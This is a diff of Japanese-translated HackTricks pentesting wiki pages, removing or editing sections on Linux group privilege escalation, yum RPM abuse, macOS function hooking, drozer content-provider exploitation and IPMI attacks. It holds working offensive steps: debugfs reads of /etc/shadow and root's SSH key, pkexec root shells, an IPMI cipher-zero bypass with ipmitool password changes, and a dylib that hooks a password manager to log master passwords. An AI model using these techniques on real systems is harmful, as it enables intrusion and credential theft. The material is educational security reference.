{{#endref}}
## Chroot & その他のジェイル バイパス
{{#ref}}
../privilege-escalation/escaping-from-limited-bash.md
{{#endref}}
## 参考文献 & その他
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits)
- [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet)
- [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
- [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
{{#include ../../banners/hacktricks-training.md}}

23
src/linux-unix/privilege-escalation/exploiting-yum.md
View File

@ -1,23 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
yumに関するさらなる例は[gtfobins](https://gtfobins.github.io/gtfobins/yum/)で見つけることができます。
# RPMパッケージを介して任意のコマンドを実行する
## 環境の確認
このベクターを利用するためには、ユーザーが特権の高いユーザー、つまりrootとしてyumコマンドを実行できる必要があります。
### このベクターの動作例
このエクスプロイトの動作例は、[tryhackme](https://tryhackme.com)の[daily bugle](https://tryhackme.com/room/dailybugle)ルームで見つけることができます。
## RPMのパッキング
次のセクションでは、[fpm](https://github.com/jordansissel/fpm)を使用してリバースシェルをRPMにパッケージ化する方法を説明します。
以下の例では、攻撃者によって定義できる任意のスクリプトを含むbefore-installトリガーを持つパッケージを作成します。このパッケージがインストールされると、任意のコマンドが実行されます。デモ用にシンプルなリバースnetcatシェルの例を使用しましたが、必要に応じて変更できます。
```text
```
{{#include ../../banners/hacktricks-training.md}}

140
src/linux-unix/privilege-escalation/interesting-groups-linux-pe.md
View File

@ -1,140 +0,0 @@
{{#include ../../banners/hacktricks-training.md}}
# Sudo/Admin グループ
## **PE - メソッド 1**
**時々**、**デフォルトで(またはいくつかのソフトウェアが必要とするために)** **/etc/sudoers** ファイル内にこれらの行のいくつかを見つけることができます:
```bash
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# Allow members of group admin to execute any command
%admin ALL=(ALL:ALL) ALL
```
これは、**sudoまたはadminグループに属する任意のユーザーがsudoとして何でも実行できる**ことを意味します。
この場合、**rootになるには次のように実行するだけです**:
```text
sudo su
```
## PE - Method 2
すべてのsuidバイナリを見つけ、バイナリ**Pkexec**があるかどうかを確認します:
```bash
find / -perm -4000 2>/dev/null
```
バイナリ pkexec が SUID バイナリであり、あなたが sudo または admin に属している場合、pkexec を使用して sudo としてバイナリを実行できる可能性があります。次の内容を確認してください:
```bash
cat /etc/polkit-1/localauthority.conf.d/*
```
そこでは、どのグループが**pkexec**を実行することを許可されているか、そして**デフォルトで**いくつかのLinuxに**sudoやadmin**のグループが**表示される**かを見つけることができます。
**rootになるには、次のコマンドを実行できます**:
```bash
pkexec "/bin/sh" #You will be prompted for your user password
```
**pkexec**を実行しようとしたときにこの**エラー**が表示される場合:
```bash
polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized
```
**権限がないからではなく、GUIなしで接続されていないからです**。この問題の回避策があります: [https://github.com/NixOS/nixpkgs/issues/18012\#issuecomment-335350903](https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903)。**2つの異なるsshセッション**が必要です:
```bash:session1
echo $$ #Step1: Get current PID
pkexec "/bin/bash" #Step 3, execute pkexec
#Step 5, if correctly authenticate, you will have a root session
```
```bash:session2
pkttyagent --process <PID of session1> #Step 2, attach pkttyagent to session1
#Step 4, you will be asked in this session to authenticate to pkexec
```
# Wheel Group
**時々**、**デフォルトで** **/etc/sudoers** ファイル内にこの行を見つけることができます:
```text
%wheel ALL=(ALL:ALL) ALL
```
これは、**wheelグループに属する任意のユーザーがsudoとして何でも実行できる**ことを意味します。
この場合、**rootになるには次のように実行するだけです**:
```text
sudo su
```
# Shadow Group
**shadow** グループのユーザーは **/etc/shadow** ファイルを **読む** ことができます:
```text
-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow
```
そうですね、ファイルを読んで**ハッシュをいくつかクラッキング**してみましょう。
# ディスクグループ
この特権はほぼ**ルートアクセスと同等**であり、マシン内のすべてのデータにアクセスできます。
ファイル:`/dev/sd[a-z][1-9]`
```text
debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow
```
注意してほしいのは、debugfsを使用すると**ファイルを書き込む**こともできるということです。例えば、`/tmp/asd1.txt``/tmp/asd2.txt`にコピーするには、次のようにします:
```bash
debugfs -w /dev/sda1
debugfs: dump /tmp/asd1.txt /tmp/asd2.txt
```
しかし、**rootが所有するファイル**(例えば`/etc/shadow``/etc/passwd`)に書き込もうとすると、"**Permission denied**"エラーが発生します。
# Video Group
コマンド`w`を使用すると、**システムにログインしているユーザー**を見つけることができ、次のような出力が表示されます:
```bash
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
yossi tty1 22:16 5:13m 0.05s 0.04s -bash
moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash
```
**tty1**は、ユーザー**yossiが物理的に**マシンのターミナルにログインしていることを意味します。
**video group**は、画面出力を表示するアクセス権を持っています。基本的に、画面を観察することができます。そのためには、**画面上の現在の画像を生データで取得**し、画面が使用している解像度を取得する必要があります。画面データは`/dev/fb0`に保存でき、この画面の解像度は`/sys/class/graphics/fb0/virtual_size`で見つけることができます。
```bash
cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size
```
**生の画像**を**開く**には、**GIMP**を使用し、**`screen.raw`**ファイルを選択し、ファイルタイプとして**Raw image data**を選択します:
![](../../images/image%20%28208%29.png)
次に、幅と高さを画面で使用されているものに変更し、異なる画像タイプを確認して(画面をより良く表示するものを選択します):
![](../../images/image%20%28295%29.png)
# Root Group
デフォルトでは、**rootグループのメンバー**は、いくつかの**サービス**設定ファイルやいくつかの**ライブラリ**ファイル、または特権昇格に使用できる**他の興味深いもの**を**変更**するアクセス権を持っているようです...
**rootメンバーが変更できるファイルを確認する**
```bash
find / -group root -perm -g=w 2>/dev/null
```
# Dockerグループ
ホストマシンのルートファイルシステムをインスタンスのボリュームにマウントできます。インスタンスが起動すると、そのボリュームに`chroot`を即座にロードします。これにより、実質的にマシン上でroot権限を得ることができます。
{{#ref}}
https://github.com/KrustyHack/docker-privilege-escalation
{{#endref}}
{{#ref}}
https://fosterelli.co/privilege-escalation-via-docker.html
{{#endref}}
# lxc/lxdグループ
[lxc - 特権昇格](lxd-privilege-escalation.md)
{{#include ../../banners/hacktricks-training.md}}

338
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md
View File

@ -1,338 +0,0 @@
# macOS Function Hooking
{{#include ../../../banners/hacktricks-training.md}}
## Function Interposing
**`__interpose`** セクション(または **`S_INTERPOSING`** フラグが付けられたセクション)を含む **dylib** を作成し、**元の** 関数と **置き換え** 関数を参照する **関数ポインタ** のタプルを含めます。
次に、**`DYLD_INSERT_LIBRARIES`** を使用して dylib を **注入** します(インターポジングはメインアプリがロードされる前に行う必要があります)。明らかに、[**`DYLD_INSERT_LIBRARIES`** の使用に適用される **制限** はここでも適用されます](../macos-proces-abuse/macos-library-injection/index.html#check-restrictions)。
### Interpose printf
{{#tabs}}
{{#tab name="interpose.c"}}
```c:interpose.c
// gcc -dynamiclib interpose.c -o interpose.dylib
#include <stdio.h>
#include <stdarg.h>
int my_printf(const char *format, ...) {
//va_list args;
//va_start(args, format);
//int ret = vprintf(format, args);
//va_end(args);
int ret = printf("Hello from interpose\n");
return ret;
}
__attribute__((used)) static struct { const void *replacement; const void *replacee; } _interpose_printf
__attribute__ ((section ("__DATA,__interpose"))) = { (const void *)(unsigned long)&my_printf, (const void *)(unsigned long)&printf };
```
{{#endtab}}
{{#tab name="hello.c"}}
```c
//gcc hello.c -o hello
#include <stdio.h>
int main() {
printf("Hello World!\n");
return 0;
}
```
{{#endtab}}
{{#tab name="interpose2.c"}}
```c
// Just another way to define an interpose
// gcc -dynamiclib interpose2.c -o interpose2.dylib
#include <stdio.h>
#define DYLD_INTERPOSE(_replacement, _replacee) \
__attribute__((used)) static struct { \
const void* replacement; \
const void* replacee; \
} _interpose_##_replacee __attribute__ ((section("__DATA, __interpose"))) = { \
(const void*) (unsigned long) &_replacement, \
(const void*) (unsigned long) &_replacee \
};
int my_printf(const char *format, ...)
{
int ret = printf("Hello from interpose\n");
return ret;
}
DYLD_INTERPOSE(my_printf,printf);
```
{{#endtab}}
{{#endtabs}}
```bash
DYLD_INSERT_LIBRARIES=./interpose.dylib ./hello
Hello from interpose
DYLD_INSERT_LIBRARIES=./interpose2.dylib ./hello
Hello from interpose
```
## メソッドスワッピング
ObjectiveCでは、メソッドは次のように呼び出されます: **`[myClassInstance nameOfTheMethodFirstParam:param1 secondParam:param2]`**
**オブジェクト**、**メソッド**、および**パラメータ**が必要です。そして、メソッドが呼び出されると、**msgが送信されます**。これは関数**`objc_msgSend`**を使用します: `int i = ((int (*)(id, SEL, NSString *, NSString *))objc_msgSend)(someObject, @selector(method1p1:p2:), value1, value2);`
オブジェクトは**`someObject`**、メソッドは**`@selector(method1p1:p2:)`**、引数は**value1**、**value2**です。
オブジェクト構造に従って、**メソッドの配列**にアクセスすることが可能で、そこには**名前**と**メソッドコードへのポインタ**が**格納されています**。
> [!CAUTION]
> メソッドとクラスは名前に基づいてアクセスされるため、この情報はバイナリに保存されます。したがって、`otool -ov </path/bin>`または[`class-dump </path/bin>`](https://github.com/nygard/class-dump)を使用して取得することが可能です。
### 生のメソッドへのアクセス
次の例のように、メソッドの情報(名前、パラメータの数、アドレスなど)にアクセスすることが可能です:
```objectivec
// gcc -framework Foundation test.m -o test
#import <Foundation/Foundation.h>
#import <objc/runtime.h>
#import <objc/message.h>
int main() {
// Get class of the variable
NSString* str = @"This is an example";
Class strClass = [str class];
NSLog(@"str's Class name: %s", class_getName(strClass));
// Get parent class of a class
Class strSuper = class_getSuperclass(strClass);
NSLog(@"Superclass name: %@",NSStringFromClass(strSuper));
// Get information about a method
SEL sel = @selector(length);
NSLog(@"Selector name: %@", NSStringFromSelector(sel));
Method m = class_getInstanceMethod(strClass,sel);
NSLog(@"Number of arguments: %d", method_getNumberOfArguments(m));
NSLog(@"Implementation address: 0x%lx", (unsigned long)method_getImplementation(m));
// Iterate through the class hierarchy
NSLog(@"Listing methods:");
Class currentClass = strClass;
while (currentClass != NULL) {
unsigned int inheritedMethodCount = 0;
Method* inheritedMethods = class_copyMethodList(currentClass, &inheritedMethodCount);
NSLog(@"Number of inherited methods in %s: %u", class_getName(currentClass), inheritedMethodCount);
for (unsigned int i = 0; i < inheritedMethodCount; i++) {
Method method = inheritedMethods[i];
SEL selector = method_getName(method);
const char* methodName = sel_getName(selector);
unsigned long address = (unsigned long)method_getImplementation(m);
NSLog(@"Inherited method name: %s (0x%lx)", methodName, address);
}
// Free the memory allocated by class_copyMethodList
free(inheritedMethods);
currentClass = class_getSuperclass(currentClass);
}
// Other ways to call uppercaseString method
if([str respondsToSelector:@selector(uppercaseString)]) {
NSString *uppercaseString = [str performSelector:@selector(uppercaseString)];
NSLog(@"Uppercase string: %@", uppercaseString);
}
// Using objc_msgSend directly
NSString *uppercaseString2 = ((NSString *(*)(id, SEL))objc_msgSend)(str, @selector(uppercaseString));
NSLog(@"Uppercase string: %@", uppercaseString2);
// Calling the address directly
IMP imp = method_getImplementation(class_getInstanceMethod(strClass, @selector(uppercaseString))); // Get the function address
NSString *(*callImp)(id,SEL) = (typeof(callImp))imp; // Generates a function capable to method from imp
NSString *uppercaseString3 = callImp(str,@selector(uppercaseString)); // Call the method
NSLog(@"Uppercase string: %@", uppercaseString3);
return 0;
}
```
### Method Swizzling with method_exchangeImplementations
関数 **`method_exchangeImplementations`** は **一つの関数の実装のアドレスを他の関数に変更する** ことを可能にします。
> [!CAUTION]
> したがって、関数が呼び出されると **実行されるのは他の関数です**
```objectivec
//gcc -framework Foundation swizzle_str.m -o swizzle_str
#import <Foundation/Foundation.h>
#import <objc/runtime.h>
// Create a new category for NSString with the method to execute
@interface NSString (SwizzleString)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from;
@end
@implementation NSString (SwizzleString)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {
NSLog(@"Custom implementation of substringFromIndex:");
// Call the original method
return [self swizzledSubstringFromIndex:from];
}
@end
int main(int argc, const char * argv[]) {
// Perform method swizzling
Method originalMethod = class_getInstanceMethod([NSString class], @selector(substringFromIndex:));
Method swizzledMethod = class_getInstanceMethod([NSString class], @selector(swizzledSubstringFromIndex:));
method_exchangeImplementations(originalMethod, swizzledMethod);
// We changed the address of one method for the other
// Now when the method substringFromIndex is called, what is really called is swizzledSubstringFromIndex
// And when swizzledSubstringFromIndex is called, substringFromIndex is really colled
// Example usage
NSString *myString = @"Hello, World!";
NSString *subString = [myString substringFromIndex:7];
NSLog(@"Substring: %@", subString);
return 0;
}
```
> [!WARNING]
> この場合、**正当な**メソッドの**実装コード**が**メソッド**の**名前**を**検証**すると、このスウィズリングを**検出**し、実行を防ぐことができます。
>
> 次の技術にはこの制限はありません。
### method_setImplementationによるメソッドスウィズリング
以前の形式は奇妙です。なぜなら、2つのメソッドの実装を互いに変更しているからです。**`method_setImplementation`**関数を使用すると、**あるメソッドの実装を別のメソッドに変更**できます。
新しい実装から元の実装を呼び出す予定がある場合は、上書きする前に**元の実装のアドレスを保存する**ことを忘れないでください。後でそのアドレスを見つけるのは非常に複雑になります。
```objectivec
#import <Foundation/Foundation.h>
#import <objc/runtime.h>
#import <objc/message.h>
static IMP original_substringFromIndex = NULL;
@interface NSString (Swizzlestring)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from;
@end
@implementation NSString (Swizzlestring)
- (NSString *)swizzledSubstringFromIndex:(NSUInteger)from {
NSLog(@"Custom implementation of substringFromIndex:");
// Call the original implementation using objc_msgSendSuper
return ((NSString *(*)(id, SEL, NSUInteger))original_substringFromIndex)(self, _cmd, from);
}
@end
int main(int argc, const char * argv[]) {
@autoreleasepool {
// Get the class of the target method
Class stringClass = [NSString class];
// Get the swizzled and original methods
Method originalMethod = class_getInstanceMethod(stringClass, @selector(substringFromIndex:));
// Get the function pointer to the swizzled method's implementation
IMP swizzledIMP = method_getImplementation(class_getInstanceMethod(stringClass, @selector(swizzledSubstringFromIndex:)));
// Swap the implementations
// It return the now overwritten implementation of the original method to store it
original_substringFromIndex = method_setImplementation(originalMethod, swizzledIMP);
// Example usage
NSString *myString = @"Hello, World!";
NSString *subString = [myString substringFromIndex:7];
NSLog(@"Substring: %@", subString);
// Set the original implementation back
method_setImplementation(originalMethod, original_substringFromIndex);
return 0;
}
}
```
## フッキング攻撃の方法論
このページでは、関数をフックするさまざまな方法について説明しました。しかし、これらは**攻撃のためにプロセス内でコードを実行する**ことを含んでいました。
そのために、最も簡単な技術は、[環境変数を介してDyldを注入するか、ハイジャックすること](../macos-dyld-hijacking-and-dyld_insert_libraries.md)です。しかし、これも[タスクポートを介したDylibプロセス注入](macos-ipc-inter-process-communication/index.html#dylib-process-injection-via-task-port)によって行うことができると思います。
ただし、両方のオプションは**保護されていない**バイナリ/プロセスに**制限**されています。各技術を確認して、制限について詳しく学んでください。
ただし、関数フッキング攻撃は非常に特定的であり、攻撃者は**プロセス内から機密情報を盗む**ためにこれを行いますそうでなければ、プロセス注入攻撃を行うだけです。この機密情報は、MacPassなどのユーザーがダウンロードしたアプリに存在する可能性があります。
したがって、攻撃者のベクターは、脆弱性を見つけるか、アプリケーションの署名を剥がし、アプリケーションのInfo.plistを介して**`DYLD_INSERT_LIBRARIES`**環境変数を注入し、次のようなものを追加することになります:
```xml
<key>LSEnvironment</key>
<dict>
<key>DYLD_INSERT_LIBRARIES</key>
<string>/Applications/Application.app/Contents/malicious.dylib</string>
</dict>
```
そして、**再登録**アプリケーションを行います:
```bash
/System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -f /Applications/Application.app
```
情報を抽出するためのフックコードをそのライブラリに追加します: パスワード、メッセージ...
> [!CAUTION]
> 新しいバージョンのmacOSでは、アプリケーションバイナリの**署名を削除**すると、以前に実行されていた場合、macOSは**アプリケーションを実行しなくなります**。
#### ライブラリの例
```objectivec
// gcc -dynamiclib -framework Foundation sniff.m -o sniff.dylib
// If you added env vars in the Info.plist don't forget to call lsregister as explained before
// Listen to the logs with something like:
// log stream --style syslog --predicate 'eventMessage CONTAINS[c] "Password"'
#include <Foundation/Foundation.h>
#import <objc/runtime.h>
// Here will be stored the real method (setPassword in this case) address
static IMP real_setPassword = NULL;
static BOOL custom_setPassword(id self, SEL _cmd, NSString* password, NSURL* keyFileURL)
{
// Function that will log the password and call the original setPassword(pass, file_path) method
NSLog(@"[+] Password is: %@", password);
// After logging the password call the original method so nothing breaks.
return ((BOOL (*)(id,SEL,NSString*, NSURL*))real_setPassword)(self, _cmd, password, keyFileURL);
}
// Library constructor to execute
__attribute__((constructor))
static void customConstructor(int argc, const char **argv) {
// Get the real method address to not lose it
Class classMPDocument = NSClassFromString(@"MPDocument");
Method real_Method = class_getInstanceMethod(classMPDocument, @selector(setPassword:keyFileURL:));
// Make the original method setPassword call the fake implementation one
IMP fake_IMP = (IMP)custom_setPassword;
real_setPassword = method_setImplementation(real_Method, fake_IMP);
}
```
## 参考文献
- [https://nshipster.com/method-swizzling/](https://nshipster.com/method-swizzling/)
{{#include ../../../banners/hacktricks-training.md}}

95
src/misc/references.md
View File

@ -1,95 +0,0 @@
{{#include ../banners/hacktricks-training.md}}
{{#ref}}
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#python-tty-shell-trick
{{#endref}}
{{#ref}}
https://hausec.com/pentesting-cheatsheet/#_Toc475368982
{{#endref}}
{{#ref}}
https://anhtai.me/pentesting-cheatsheet/
{{#endref}}
{{#ref}}
https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html
{{#endref}}
{{#ref}}
https://ired.team/offensive-security-experiments/offensive-security-cheetsheets
{{#endref}}
{{#ref}}
https://chryzsh.gitbooks.io/pentestbook/basics_of_windows.html
{{#endref}}
{{#ref}}
https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
{{#endref}}
{{#ref}}
https://anhtai.me/oscp-fun-guide/
{{#endref}}
{{#ref}}
https://www.thehacker.recipes/
{{#endref}}
{{#ref}}
https://github.com/swisskyrepo/PayloadsAllTheThings
{{#endref}}
{{#ref}}
https://gtfobins.github.io/
{{#endref}}
{{#ref}}
https://github.com/RistBS/Awesome-RedTeam-Cheatsheet
{{#endref}}
{{#ref}}
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
{{#endref}}
{{#ref}}
https://hideandsec.sh/
{{#endref}}
{{#ref}}
https://cheatsheet.haax.fr/
{{#endref}}
{{#ref}}
https://infosecwriteups.com/
{{#endref}}
{{#ref}}
https://www.exploit-db.com/
{{#endref}}
{{#ref}}
https://wadcoms.github.io/
{{#endref}}
{{#ref}}
https://lolbas-project.github.io
{{#endref}}
{{#ref}}
https://pentestbook.six2dez.com/
{{#endref}}
{{#ref}}
https://www.hackingarticles.in/
{{#endref}}
{{#ref}}
https://pentestlab.blog/
{{#endref}}
{{#ref}}
https://ippsec.rocks/
{{#endref}}
{{#include ../banners/hacktricks-training.md}}

34
src/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md
View File

@ -1,12 +1,10 @@
# Exploiting Content Providers
## Exploiting Content Providers
{{#include ../../../banners/hacktricks-training.md}}
## Intro
データは**あるアプリケーションから他のアプリケーションに**要求に応じて、**コンテンツプロバイダー**として知られるコンポーネントによって供給されます。これらの要求は**ContentResolverクラス**のメソッドを通じて管理されます。コンテンツプロバイダーは、データを**データベース**、**ファイル**、または**ネットワーク**などのさまざまな場所に保存できます。
データは、**コンテンツプロバイダー**として知られるコンポーネントによって、**他のアプリケーションに供給されます**。これらのリクエストは、**ContentResolverクラス**のメソッドを通じて管理されます。コンテンツプロバイダーは、**データベース**、**ファイル**、または**ネットワーク**など、さまざまな場所にデータを保存できます。
_Manifest.xml_ファイルでは、コンテンツプロバイダーの宣言が必要です。例えば:
```xml
@ -18,7 +16,7 @@ _Manifest.xml_ファイルでは、コンテンツプロバイダーの宣言が
**おそらく、プライベートデータにアクセスしたり、いくつかの脆弱性SQLインジェクションやパストラバーサルを悪用することができます。**
## **露出したコンテンツプロバイダー**から情報を取得する
## **公開されたコンテンツプロバイダー**から情報を取得する
```
dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
@ -40,7 +38,7 @@ Content Provider: com.mwr.example.sieve.FileBackupProvider
Multiprocess Allowed: True
Grant Uri Permissions: False
```
「_content://_」で始まるURIを使用することで、**DBContentProvider**に到達する方法を組み立てること可能です。このアプローチは、Drozerを使用して得られた洞察に基づいており、重要な情報は_/Keys_ディレクトリにありました。
**DBContentProvider**に到達する方法を組み立てることは、URIを「_content://_」で始めることで可能です。このアプローチは、Drozerを使用して得られた洞察に基づいており、重要な情報は_/Keys_ディレクトリにありました。
Drozerは**いくつかのURIを推測して試すことができます**:
```
@ -54,28 +52,28 @@ content://com.mwr.example.sieve.DBContentProvider/Keys/
content://com.mwr.example.sieve.DBContentProvider/Passwords
content://com.mwr.example.sieve.DBContentProvider/Passwords/
```
あなたはまた、**ContentProviderコード**をチェックしてクエリを探すべきです:
あなたはまた、**ContentProvider コード**をチェックしてクエリを探すべきです:
![](<../../../images/image (121) (1) (1) (1).png>)
また、完全なクエリが見つからない場合は、`onCreate`メソッドで**ContentProviderによって宣言された名前**をチェックすることができます:
また、完全なクエリが見つからない場合は、`onCreate` メソッドで **ContentProvider によって宣言された名前**をチェックすることができます:
![](<../../../images/image (564).png>)
クエリは次のようになります:`content://name.of.package.class/declared_name`
クエリは次のようになります: `content://name.of.package.class/declared_name`
## **データベースバックのContent Providers**
## **データベースバックの Content Providers**
おそらくほとんどのContent Providersは**データベース**の**インターフェース**として使用されています。したがって、アクセスできれば、情報を**抽出、更新、挿入、削除**できる可能性があります。\
**機密情報にアクセスできるか**確認するか、**認証**メカニズムを**回避**するために変更を試みてください。
おそらくほとんどの Content Providers **データベース**のための **インターフェース**として使用されています。したがって、アクセスできる場合は、情報を **抽出、更新、挿入、削除**できる可能性があります。\
**機密情報にアクセスできるか**確認するか、**認証**メカニズムを **バイパス**するためにそれを変更しようとしてください。
Content Providerのコードをチェックする際には、_query、insert、update、delete_のように名前付けされた**関数**も**探してください**
Content Provider のコードをチェックする際には、_query、insert、update、delete_ のように名前付けされた **関数**も探してください:
![](<../../../images/image (887).png>)
![](<../../../images/image (254) (1) (1) (1) (1) (1) (1) (1).png>)
![](<../../../images/image (254) (1) (1) (1) (1) (1) (1).png>)
れらを呼び出すことができるからです。
れらを呼び出すことができるからです。
### クエリコンテンツ
```
@ -89,13 +87,13 @@ email: incognitoguy50@gmail.com
```
### Insert content
データベースをクエリすることで、**カラムの名前**を学び、その後、DBにデータを挿入できるようになります:
データベースをクエリすることで、**カラムの名前**を学ぶことができ、その後、DBにデータを挿入することができます:
![](<../../../images/image (98).png>)
![](<../../../images/image (173).png>)
_挿入と更新では、--stringを使用して文字列を示し、--doubleを使用してダブルを示し、--float、--integer、--long、--short、--booleanを使用できます_
_挿入と更新では、--stringを使用して文字列を示し、--doubleを使用して倍精度を示し、--float、--integer、--long、--short、--booleanを使用できます_
### Update content
@ -160,9 +158,9 @@ sqlite_sequence
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
```
### **パストラバーサル**
### **パス トラバーサル**
ファイルにアクセスできる場合、パストラバーサルを悪用しようとすることができます(この場合、これは必要ありませんが、"_../_"や類似のトリックを使用してみることができます)。
ファイルにアクセスできる場合、パス トラバーサルを悪用しようとすることができます(この場合、これは必要ありませんが、"_../_"や類似のトリックを使用してみることができます)。
```
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost

24
src/network-services-pentesting/623-udp-ipmi.md
View File

@ -1,7 +1,5 @@
# 623/UDP/TCP - IPMI
## 623/UDP/TCP - IPMI
{{#include ../banners/hacktricks-training.md}}
## 基本情報
@ -10,21 +8,21 @@
**[インテリジェントプラットフォーム管理インターフェース (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** は、オペレーティングシステムや電源状態に依存せず、コンピュータシステムのリモート管理と監視のための標準化されたアプローチを提供します。この技術により、システム管理者はシステムがオフまたは応答しない場合でもリモートで管理でき、特に以下の用途に便利です:
- OSブート前の構成
- OSブート前の設定
- 電源オフ管理
- システム障害からの回復
IPMIは、温度、電圧、ファン速度、電源供給の監視が可能で、在庫情報の提供、ハードウェアログのレビュー、SNMPを介したアラートの送信も行います。その運用に必要なのは、電源とLAN接続です。
1998年にIntelによって導入されて以来、IPMIは多くのベンダーによってサポートされ、特にバージョン2.0のLAN経由のシリアルサポートによりリモート管理機能が強化されました。主要なコンポーネントには以下が含まれます
1998年にインテルによって導入されて以来、IPMIは多くのベンダーによってサポートされ、特にバージョン2.0のLAN経由のシリアルサポートによりリモート管理機能が強化されました。主要なコンポーネントには以下が含まれます
- **ベースボード管理コントローラー (BMC):** IPMI操作のための主要なマイクロコントローラー。
- **通信バスとインターフェース:** ICMB、IPMB、ローカルおよびネットワーク接続用のさまざまなインターフェースを含む内部および外部通信のためのもの
- **通信バスとインターフェース:** 内部および外部通信のためのICMB、IPMB、さまざまなローカルおよびネットワーク接続用インターフェース。
- **IPMIメモリ:** ログとデータを保存するためのもの。
![https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right)
**デフォルトポート**: 623/UDP/TCP (通常はUDPですが、TCPで動作している場合もあります)
**デフォルトポート**: 623/UDP/TCP通常はUDPですが、TCPで動作している場合もあります
## 列挙
@ -34,14 +32,14 @@ nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use auxiliary/scanner/ipmi/ipmi_version
```
バージョンを特定するには、次のコマンドを使用できます:
バージョンを特定するには、次のようにします:
```bash
use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10
```
### IPMIの脆弱性
IPMI 2.0の領域では、Dan Farmerによって重要なセキュリティ欠陥が発見され、**cipher type 0**を通じて脆弱性が露呈しました。この脆弱性は、[Dan Farmerの研究](http://fish2.com/ipmi/cipherzero.html)に詳細に文書化されており、有効なユーザーがターゲットにされる限り、任意のパスワードで不正アクセスを可能にします。この弱点は、HP、Dell、SupermicroなどのさまざまなBMC見つかり、すべてのIPMI 2.0実装における広範な問題を示唆しています。
IPMI 2.0の領域では、Dan Farmerによって重要なセキュリティ欠陥が発見され、**cipher type 0**を通じて脆弱性が露呈しました。この脆弱性は、[Dan Farmerの研究](http://fish2.com/ipmi/cipherzero.html)に詳細に文書化されており、有効なユーザーがターゲットにされる限り、任意のパスワードで不正アクセスを可能にします。この弱点は、HP、Dell、SupermicroなどのさまざまなBMCから見つかり、すべてのIPMI 2.0実装における広範な問題を示唆しています。
### **Cipher 0によるIPMI認証バイパス**
@ -49,7 +47,7 @@ IPMI 2.0の領域では、Dan Farmerによって重要なセキュリティ欠
```bash
use auxiliary/scanner/ipmi/ipmi_cipher_zero
```
この欠陥の悪用は、以下に示すように `ipmitool` を使用して実現可能であり、ユーザーパスワードのリスト表示と変更を可能にします:
この脆弱性の悪用は、以下に示すように `ipmitool` を使用して実現可能であり、ユーザーパスワードのリスト表示と変更が可能です:
```bash
apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
@ -74,15 +72,15 @@ IPMI 2.0の重要な設計選択は、認証目的でBMC内に平文パスワー
```bash
cat /nv/PSBlock
```
### **Supermicro IPMI UPnP 脆弱性**
### **Supermicro IPMI UPnP脆弱性**
SupermicroのIPMIファームウェアにUPnP SSDPリスナーが含まれていること、特にUDPポート1900での実装は、深刻なセキュリティリスクをもたらします。 [Rapid7の開示](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play) に詳述されているように、UPnPデバイス用Intel SDKバージョン1.3.1の脆弱性により、BMCへのルートアクセスが可能になります。
SupermicroのIPMIファームウェアにおけるUPnP SSDPリスナーの組み込み、特にUDPポート1900での実装は、深刻なセキュリティリスクをもたらします。 [Rapid7の開示](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play) に詳述されているように、UPnPデバイス用Intel SDKバージョン1.3.1の脆弱性により、BMCへのルートアクセスが可能になります。
```bash
msf> use exploit/multi/upnp/libupnp_ssdp_overflow
```
### ブルートフォース
**HPは製造時に**その**Integrated Lights Out (iLO)**製品のデフォルトパスワードをランダム化します。この慣行は、**静的デフォルト資格情報**を使用する他のメーカーとは対照的です。さまざまな製品のデフォルトユーザー名とパスワードの概要は以下の通りです:
**HPは製造時に**その**Integrated Lights Out (iLO)**製品のデフォルトパスワードをランダム化します。この慣行は、**静的デフォルト資格情報**を使用する他のメーカーとは対照的です。さまざまな製品のデフォルトユーザー名とパスワードの概要は以下の通りです:
- **HP Integrated Lights Out (iLO)**は、**工場でランダム化された8文字の文字列**をデフォルトパスワードとして使用し、より高いセキュリティレベルを示しています。
